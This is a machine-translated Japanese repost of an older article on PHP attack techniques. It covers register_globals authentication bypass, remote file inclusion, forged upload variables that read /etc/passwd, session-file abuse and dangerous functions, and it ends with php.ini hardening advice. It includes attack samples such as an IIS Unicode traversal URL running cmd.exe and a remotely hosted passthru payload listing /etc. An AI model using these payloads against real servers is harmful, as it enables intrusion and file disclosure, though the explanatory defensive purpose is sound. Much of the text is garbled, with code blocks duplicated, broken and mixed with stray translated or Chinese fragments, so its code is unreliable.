PHP プログラムにおける一般的な脆弱性攻撃の分析

PHP プログラムに対する一般的な脆弱性攻撃の分析

要約: PHP が普及しているため、一部のハッカーは PHP プログラムの脆弱性を利用した攻撃を常に行っています。 。このセクションでは、グローバル変数、リモート ファイル、ファイル アップロード、ライブラリ ファイル、セッション ファイル、データ型、エラーが発生しやすい関数の側面から PHP のセキュリティを分析します。

グローバル変数を使用して攻撃するにはどうすればよいですか?

PHP の変数は事前に宣言する必要はなく、初めて使用するときに自動的に作成され、その型はコンテキストに基づいて自動的に決定されます。プログラマの観点から見ると、これは間違いなく非常に便利なアプローチです。変数を作成したら、プログラム内のどこでも使用できます。この機能の結果、プログラマは変数を初期化することがほとんどなくなります。

明らかに、PHP ベースのアプリケーションの main 関数は通常、ユーザー入力 (主にフォーム変数、アップロードされたファイル、Cookie など) を受け入れ、入力データを処理して、結果をクライアントに返します。ブラウザを終了します。 PHP コードがユーザー入力にできるだけ簡単にアクセスできるようにするために、PHP は実際にこの入力データをグローバル変数として扱います。

例:

プログラム コード

＜FORM METHOD="GET" ACTION="test.php"＞
＜INPUT TYPE="TEXT" NAME="hello"＞
＜INPUT TYPE="SUBMIT"＞
＜/FORM＞

これにより、テキスト ボックスと送信ボタンが表示されます。ユーザーが送信ボタンをクリックすると、「test.php」がユーザーの入力を処理します。「test.php」が実行されると、ユーザーがテキスト ボックスに入力したデータが「$hello」に含まれます。ここから、攻撃者が自分の希望に応じて任意のグローバル変数を作成できることがわかります。攻撃者がフォーム入力を通じて「test.php」を呼び出すのではなく、ブラウザのアドレスバーに http://server/test.php?hello=hi&setup=no を直接入力すると、「$hello」だけでなく、 「$setup」も作成されます。

次のユーザー認証コードは、PHP のグローバル変数によって引き起こされるセキュリティ問題を明らかにします:

プログラム コード

＜?php
if ($pass == "hello")
$auth = 1;
...
if ($auth == 1)
echo "some important information";
?＞

if ($pass == "hello")

$auth = 1;

...

if ($auth == 1)

「重要な情報」をエコーし​​ます;

?>

上記のコードは、まずユーザーのパスワードが「hello」であるかどうかを確認し、一致する場合は、「$auth」を「1」に設定します。これは、認証が成功したことを意味します。その後、「$suth」が「1」の場合、いくつかの重要な情報が表示されます。

このコードは、値が設定されていない場合は "$auth" が空であると想定していますが、攻撃者は "http://server/test.php? auth= 1" メソッドを使用すると、このコードを完全に騙して認証済みであると信じ込ませることができます。

したがって、PHP プログラムのセキュリティを向上させるために、明確に定義されていない変数は信頼できません。プログラム内に多くの変数がある場合、これは非常に困難な作業になる可能性があります。

一般的な保護方法は、送信方法 (GET または POST) に応じて、配列 HTTP_GET[] または POST_VARS[] 内の変数をチェックすることです。 PHP が「track_vars」オプションをオンにして構成されている場合 (これがデフォルトです)、ユーザーが送信した変数はグローバル変数と上記の配列で使用できます。

しかし、PHP にはユーザー入力の処理に使用される 4 つの異なる配列変数があることは言及する価値があります。 HTTP_GET_VARS 配列は GET モードで送信された変数の処理に使用され、HTTP_POST_VARS 配列は POST モードで送信された変数の処理に使用され、HTTP_COOKIE_VARS 配列は Cookie ヘッダーとして送信された変数の処理に使用され、HTTP_POST_FILES 配列 (比較的新しい PHP によって提供される) に使用されます。 )、これはユーザーが変数を送信するための完全にオプションの方法です。ユーザーリクエストは変数をこれら 4 つの配列に簡単に保存できるため、安全な PHP プログラムはこれら 4 つの配列をチェックする必要があります。 リモートファイル経由で攻撃するにはどうすればよいですか?

＜?php
if (!($fd = fopen("$filename", "r"))
echo("Could not open file: $filename
n");
?＞

PHP は、プログラマが特定の関数を簡単に実装できるようにするための多数の関数を提供する機能豊富な言語です。しかし、セキュリティの観点から見ると、機能が多ければ多いほど、そのセキュリティを確保することが難しくなります。プログラム コードテーブル>

上記のスクリプトは、ファイル "$filename" を開こうとしますが、失敗するとエラー メッセージが表示されます。明らかに、「$filename」を指定できれば、このスクリプトを使用してシステム上の任意のファイルを参照できます。ただし、このスクリプトのあまり明らかではない機能は、他の WEB サイトまたは FTP サイトからファイルを読み取ることができることです。実際、PHP のファイル処理関数のほとんどは、リモート ファイルを透過的に処理します。

例:

「$filename」が「http://target/scripts/..� ../winnt/system32/cmd.exe?/c dir」として指定されている場合

上記のコードは、実際にはホスト ターゲットの Unicode 脆弱性を悪用して dir コマンドを実行します。これにより、リモート ファイルに対する include()、require()、include_once()、および require_once() のサポートがコンテキストでより興味深いものになります。これらの関数の主な機能は、指定されたファイルの内容を組み込み、PHP コードに従って解釈することです。これらは主にライブラリ ファイルで使用されます。

例:

プログラム コード

if ( !($ fd = fopen("$filename", "r"))echo("ファイルを開けませんでした: $filenamen");?>

＜?php
include($libdir . "/languages.php");
?＞

上記の例では、通常、「$libdir」はコードを実行する前に設定されているパスです。攻撃者は、「$libdir」が設定されていない場合、このパスを変更できます。しかし、攻撃者は指定したパスにあるファイル language.php にしかアクセスできないため、何もできません (Perl の「Poisonnull バイト」攻撃は PHP には影響しません)。しかし、リモート ファイルのサポートにより、攻撃者は何でもできるようになります。たとえば、攻撃者は、

プログラム コード

＜?php
passthru("/bin/ls /etc");
?＞

という内容を含むファイル language.php をサーバー上に配置し、「$libdir」を「」に設定する可能性があります。 http:///" を参照すると、ターゲット ホスト上で上記の攻撃コードを実行でき、結果として "/etc" ディレクトリの内容が顧客のブラウザに返されます。

攻撃コードは、それが配置されているサーバー (つまり、evilhost) 上で独自の PHP プログラムを実行しないことに注意してください。それ以外の場合、攻撃コードは、それが配置されているサーバーを攻撃するのではなく、そのサーバーを攻撃します。ターゲットサーバーを実装します。

ファイルアップロード経由で攻撃するには?

PHP は、RFC 1867 に基づいてファイルのアップロードを自動的にサポートします。次の例を見てみましょう:

プログラム コード

＜FORM METHOD="POST" ENCTYPE="multipart/form-data"＞
＜INPUT TYPE="FILE" NAME="hello"＞
＜INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="10240"＞
＜INPUT TYPE="SUBMIT"＞
＜/FORM＞

上記のコードにより、ユーザーはローカル マシンからファイルを選択でき、送信をクリックすると、ファイルがサーバーにアップロードされます。 。これは明らかに便利な機能ですが、PHP の応答方法により、この機能は安全ではなくなります。 PHP がそのようなリクエストを初めて受信すると、呼び出された PHP コードの解析を開始する前でも、まずリモート ユーザーからファイルを受け入れ、ファイルの長さが「$MAX_FILE_SIZE 変数」で定義された値を超えているかどうかを確認します。テスト用に、ファイルはローカルの一時ディレクトリに保存されます。

したがって、PHP プログラムがファイルのアップロードを受け入れるかどうかを決定する前に、攻撃者は PHP を実行しているホストに任意のファイルを送信することができます。

ファイルのアップロードを処理する PHP プログラムを考えてみましょう。上で述べたように、ファイルは通常の拡張子 It 付きでサーバー (場所は構成ファイルで指定されており、通常は /tmp) で受信され、保存されます。はランダムで、「phpxXuoXG」の形式に似ています。 PHP プログラムはファイルを処理するためにファイルの情報をアップロードする必要があります。これには 2 つの方法があります。1 つは PHP3 ですでに使用されており、もう 1 つは以前の方法に関するセキュリティ アドバイザリを作成した後に導入されました。

ほとんどの PHP プログラムは、アップロードされたファイルを処理するために依然として古い方法を使用しています。 PHP は、上記の例のように、アップロードされたファイルを記述する 4 つのグローバル変数を設定します:

$hello = Filename on local machine (e.g "/tmp/phpxXuoXG")
$hello_size = Size in bytes of file (e.g 1024)
$hello_name = The original name of the file on the remote system (e.g"c:\temp\hello.txt")
$hello_type = Mime type of uploaded file (e.g "text/plain")

プログラム コード

$hello = ローカル マシン上のファイル名 (例: "/tmp/phpxXuoXG")$hello_size = サイズ (バイト単位)ファイルの名前 (例: 1024)

http://vulnhost/vuln.php?hello=/ ... e=10240&hello_type=
text/plain&hello_name=hello.txt

$hello_name = リモート システム上のファイルの元の名前 (例: "c:\temp\hello.txt")$hello_type = アップロードされたファイルの MIME タイプ (例: " text /plain")

次に、PHP プログラムは、「$hello」に従って指定されたファイルの処理を開始します。問題は、「$hello」が必ずしも PHP によって設定される変数ではなく、リモート ユーザーであれば誰でも指定できることです。次のメソッドを使用すると:

は、次の PHP グローバル変数につながります (もちろん POST メソッドも (Cookie でも) 可能です):

プログラム コード

http://vulnhost/vuln.php?hello=/ ... e=10240&hello_type=text/plain&hello_name=hello.txt

$hello = "/etc/passwd"
$hello_size = 10240
$hello_type = "text/plain"
$hello_name = "hello.txt"

上記のフォーム データは PHP を満たすだけですProgram 予期される変数ですが、現時点では、PHP プログラムはアップローダーのローカル マシン上にあるはずのアップロードされたファイルを処理せず、代わりにサーバー上の "/etc/passwd" ファイルを処理します (これにより、通常はコンテンツが公開されます)。この攻撃を使用すると、機密ファイルの内容が暴露される可能性があります。

PHP の新しいバージョンは、HTTP_POST_FILES[] を使用してアップロードされたファイルを判断し、この問題を解決するための多くの関数も提供します。たとえば、ファイルが実際にアップロードされたかどうかを判断する関数もあります。しかし実際には、依然として古い方法を使用している PHP プログラムが多数あるはずなので、それらもこの攻撃に対して脆弱です。

ファイル アップロード攻撃手法の変形として、次のコードを見てみましょう:

プログラム コード

＜?php
if (file_exists($theme)) // Checks the file exists on the local system (noremote files)
include("$theme");
?＞

攻撃者が " を制御できる場合$theme" そうであれば、明らかに "$theme" を使用してリモート システム上の任意のファイルを読み取ることができます。攻撃者の最終的な目標は、リモート サーバー上で任意の命令を実行することですが、リモート ファイルを使用できないため、リモート サーバー上に PHP ファイルを作成する必要があります。これは最初は不可能に思えるかもしれませんが、攻撃者が最初に PHP コードを含むファイルをローカル マシン上に作成し、次に "theme" という名前のファイル フィールドを含むフォームを作成し、最後にこのフォームを使用すると、これが行われます。作成した PHP コードを含むファイルをファイルアップロードを通じて上記のコードに送信すると、PHP は攻撃者が送信したファイルを保存し、file_exists() 関数を攻撃者が送信したファイルに設定します。チェックに合格し、攻撃者のコードが実行されます。
攻撃者は、任意の命令を実行する能力を獲得した後、明らかに権限を昇格させたり、結果を拡張したりしようとしましたが、そのためにはサーバー上で利用できないいくつかのツールセットが必要になり、ファイルのアップロードが再び攻撃者を助けました。攻撃者は、ファイル アップロード機能を使用してツールをアップロードし、サーバーに保存してからコマンドを実行し、chmod() を使用してファイルのアクセス許可を変更し、それを実行する可能性があります。 たとえば、攻撃者はファイアウォールまたは IDS をバイパスして、ローカルの root 攻撃プログラムをアップロードして実行し、root 権限を取得する可能性があります。

ライブラリ ファイルを介して攻撃するにはどうすればよいですか?

前に説明したように、include() と require() は主にコード ベースをサポートするためのものです。これは、必要に応じて、頻繁に使用される関数を別のファイルに入れることが多いためです。その中の関数を使用する場合は、このコード ライブラリを現在のファイルに含めるだけで済みます。

当初、PHP プログラムを開発してリリースするとき、コード ライブラリとメインのプログラム コードを区別するために、通常はコード ライブラリ ファイルに「.inc」拡張子を設定していましたが、すぐにこれが原因であることがわかりました。このようなファイルは、PHP インタープリターによって PHP コードに正しく解析できないため、エラーとなりました。このようなファイルをサーバー上で直接リクエストすると、そのファイルのソースコードが取得されます。これは、PHP が Apache モジュールとして使用される場合、PHP インタープリターがファイルの拡張子に基づいてそれを PHP に解析するかどうかを決定するためです。コードの。拡張子はサイト管理者によって指定されます。通常は「.php」、「.php3」、「.php4」です。重要な構成データが適切な拡張子なしで PHP ファイルに含まれている場合、リモート攻撃者がこの情報を簡単に入手できます。

最も簡単な解決策は、各ファイルに PHP ファイル拡張子を指定することです。これにより、ソース コードの漏洩を効果的に防ぐことができますが、攻撃者がこのファイルを要求することで、本来のコードが作成される可能性があります。コンテキスト内で独立して実行すると、前述したすべての攻撃が発生する可能性があります。

以下は明らかな例です:

main.php 内:

プログラム コード

＜?php 
$libDir = "/libdir"; 
$langDir = "$libdir/languages"; 
... 
include("$libdir/loadlanguage.php": 
?＞

$libDir = "/libdir";

$ langDir = "$libdir/langages";

...

＜?php 
...

include("$langDir/$userLang"); 
?＞

include("$libdir/load language.php": ?> libdir/load language.php 内:

...include("$langDir/$userLang") ?>

「libdir/load language.php」が「main.php」によって呼び出される場合は非常に安全ですが、「libdir/load language」の拡張子は「.php」であるため、リモートの攻撃者がこれを直接リクエストする可能性があります。ファイルの「$langDir」と「$userLang」の値は任意に指定できます。

セッションファイルを介して攻撃するにはどうすればよいですか?

PHP 4 以降のバージョンは、セッションのサポートを提供します。その主な機能は、PHP プログラムのページ間のステータス情報を保存することです。たとえば、ユーザーが Web サイトにログインすると、ログインしたという事実と、Web サイトにログインしたユーザーに関する情報がセッションに保存され、Web サイトを閲覧すると、すべての PHP コードがこの状態を取得できます。情報。

実際、セッションが開始されると (実際には、最初のリクエストで自動的に開始するように構成ファイルで設定されます)、リモート ブラウザーが常にこれを送信すると、ランダムな「セッション ID」が生成されます。セッションID」をリクエスト送信時に送信すると、セッションは維持されます。これは、Cookie を使用するか、各ページでフォーム変数 (「セッション ID」を含む) を送信することで簡単に実現できます。 PHP プログラムはセッションを使用して特別な変数を登録でき、その値は各 PHP スクリプトの終了後にセッション ファイルに保存され、各 PHP スクリプトの開始前にも変数にロードされます。以下は簡単な例です:

プログラム コード

＜?php 
session_destroy(); // Kill any data currently in the session 
$session_auth = "shaun"; 
session_register("session_auth"); // Register $session_auth as a session variable 
?＞

session_destroy(); // 現在セッション内のデータをすべて削除します

$session_auth = "shaun"
session_auth; "); // $session_auth をセッション変数として登録します

?>

新しいバージョンの PHP は自動的に "$session_auth" を登録します" 値は "shaun" に設定されます。値が変更された場合、今後のスクリプトは変更された値を自動的に受け入れます。これは確かにステートレス Web にとって非常に優れたツールですが、注意する必要もあります。

＜?php 
if (!empty($session_auth)) 
// Grant access to site here 
?＞

明らかな問題は、変数がセッションから取得されたものであることを確認することです。たとえば、上記のコードの場合、後続のスクリプトが次のとおりです。 " border="0" cellpacing="0" cellpadding="6" align="center"> if (!empty($session_auth )) // ここでサイトへのアクセスを許可します ?>

上記のコードは、「$session_auth」に値が割り当てられている場合、その値はユーザー入力ではなくセッションから割り当てられており、攻撃者がフォーム入力を通じて値を割り当てた場合、サイトにアクセスできると想定しています。攻撃者は、この攻撃方法を使用する前に変数をセッションに登録する必要があることに注意してください。変数がセッションに配置されると、フォーム入力はすべて上書きされます。

セッション データは通常、ファイルに保存されます (場所は設定可能で、通常は「/tmp」)。このファイルには変数名が含まれます。変数のタイプ、変数の値、およびその他のデータ。マルチホスト システムでは、ファイルが Web サーバーを実行しているユーザー (通常は誰も) として保存されるため、悪意のあるサイト所有者がセッション ファイルを作成して他のサイトにアクセスしたり、セッション ファイルの機密情報を検査したりする可能性があります。 。

セッション メカニズムは、攻撃者が自分の入力をリモート システム上のファイルに保存するための別の利便性も提供します。上記の例では、攻撃者は PHP コードを含むファイルをリモート システムに配置する必要がありますが、ファイル アップロードを使用してこれを実行できない場合は、通常、セッションを使用して自分の希望に従って変数に値を割り当て、その後、その値を推測します。セッション ファイルの場所であり、ファイル名が「php」であることがわかっているため、ディレクトリを推測するだけで済みます。通常、ディレクトリは「/tmp」です。

さらに、攻撃者は任意に「セッション ID」 (「hello」など) を指定し、この「セッション ID」を使用してセッション ファイル (「/tmp/sess_hello」など) を作成する可能性があります。ただし、「セッション ID」には文字と数字の組み合わせのみを使用できます。

データ型を使用して攻撃するにはどうすればよいですか?

PHP には緩いデータ型があり、変数の型は変数が配置されているコンテキストによって異なります。例: "$hello" は値 "" を持つ文字列変数として開始されますが、評価中に整数変数 "0" になり、予期しない結果が生じる場合があります。 "$hello" の値が "000" と "0" の間で異なる場合、empty() によって返される結果は true ではありません。

PHP の配列は連想配列です。つまり、配列のインデックスは文字列型です。これは、「$hello["000"]」と「$hello[0]」も異なることを意味します。

プログラムを開発するときは、上記の問題を注意深く考慮する必要があります。たとえば、ある場所で変数が「0」であるかどうかをテストし、別の場所でそれを検証するために empty() を使用するべきではありません。

エラーが発生しやすい関数を使用して攻撃するにはどうすればよいですか?以下は、エラーが発生しやすい関数の詳細なリストです:

require()：读取指定文件的内容并且作为PHP代码解释 
include()：同上 
eval()：把给定的字符串作为PHP代码执行 
preg_replace()：当与"/e"开关一起使用时，替换字符串将被解释为PHP代码

exec(): 指定されたコマンドを実行して戻ります実行結果の最後の行

exec()：执行指定的命令，返回执行结果的最后一行 
passthru()：执行指定命令，返回所有结果到客户浏览器 
``：执行指定命令，返回所有结果到一个数组 
system()：同passthru()，但是不处理二进制数据 
popen()：执行指定的命令，把输入或输出连接到PHP文件描述符

passthru(): 指定されたコマンドを実行し、すべての結果をクライアントのブラウザに返します

``: 指定されたコマンドを実行し、すべての結果を配列に返します

system(): passthru() と同じですが、バイナリ データは処理しません

fopen()：打开文件，并对应一个PHP文件描述符 
readfile()：读取文件的内容，然后输出到客户浏览器 
file()：把整个文件内容读到一个数组中

popen(): 指定されたコマンドを実行し、入力または出力を PHP ファイル記述子に接続します

fopen(): ファイルを開き、PHP ファイル記述子に対応します readfile(): ファイルの内容を読み取り、クライアントのブラウザに出力します file(): 読み取りファイルの内容全体を配列に格納します

PHP のセキュリティを強化するにはどうすればよいですか?

上で紹介した攻撃はすべて、デフォルトでインストールされている PHP4 に適切に実装できますが、PHP の構成はいくつかの PHP オプションを構成することで非常に柔軟になります。これらの攻撃の一部に抵抗することは完全に可能です。以下に、実装の難易度に応じていくつかの構成を分類します。

*低難易度
**中低難易度
***中高難易度
****高難易度

PHP が提供するすべてのオプションを使用すると、PHP の機能の多くは使用できなくなるため、サードパーティのコードであっても PHP は非常に安全になります。

**** "register_globals" を "off" に設定します
このオプションは、PHP によるユーザー入力用のグローバル変数の作成を無効にします。つまり、ユーザーがフォーム変数 "hello" を送信した場合、PHP は「$hello」は作成されません。「HTTP_GET/POST_VARS[''hello'']」のみが作成されます。これは PHP では非常に重要なオプションです。このオプションをオフにすると、プログラミングに大きな不便が生じます。

*** 「safe_mode」を「on」に設定します

このオプションを開くと、次の制限が追加されます:

1. 実行できるコマンドを制限する
2. 使用できる機能を制限する
3. スクリプトの所有権とターゲット ファイルの所有権に基づくファイル アクセス制限
4. ファイルのアップロードを無効にする

これは ISP にとって「優れた」オプションであり、PHP のセキュリティも大幅に向上します。

** "open_basedir" を設定します

このオプションは、指定されたディレクトリ外でのファイル操作を禁止し、include() によるローカル ファイルまたはリモート ファイルへの攻撃を効果的に排除できますが、それでも注意が必要ですファイルアップロードおよびセッションファイル攻撃に影響します。

** "display_errors" を "off" に設定し、"log_errors" を "on" に設定します

このオプションは、エラー メッセージが Web ページに表示されることを禁止しますが、ログには記録されますこれにより、攻撃者がターゲット スクリプト内の関数を検出するのを効果的に防ぐことができます。

* "allow_url_fopen" を "off" に設定します

このオプションにより、リモート ファイル機能を無効にすることができます。

転載元: http://www.aspnetjia.com/Cont-222.html